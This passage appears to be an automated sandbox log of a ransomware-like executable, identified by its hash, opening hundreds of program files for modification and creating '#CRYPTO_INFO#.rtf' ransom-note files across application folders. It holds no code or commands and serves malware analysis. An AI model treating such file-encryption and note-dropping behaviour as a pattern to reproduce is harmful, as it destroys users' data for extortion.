8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\zh-TW.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\selection-actions2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\jamendo.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\illustrations.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\cstm_brand_preview2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\core\org-openide-filesystems.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\logo_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\dot.cur 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\application.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\NEWS.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_anonymoususer_24.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\epl-v10.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\locale\updater_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javap.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd-Oblique.otf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\pdf.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviewers.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\sendforsignature.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-disabled_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\pt_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_agreement_filetype.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\illustrations_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\resources.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_invite_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jjs.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_selectlist_checkmark_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\java.security 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\id_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\lv.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_hover.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\bun.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\javaws.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-print.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\dd_arrow_small2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ro_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\nub.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\VideoLAN Website.url 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\ReadOutLoud.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\de-de\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\help.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 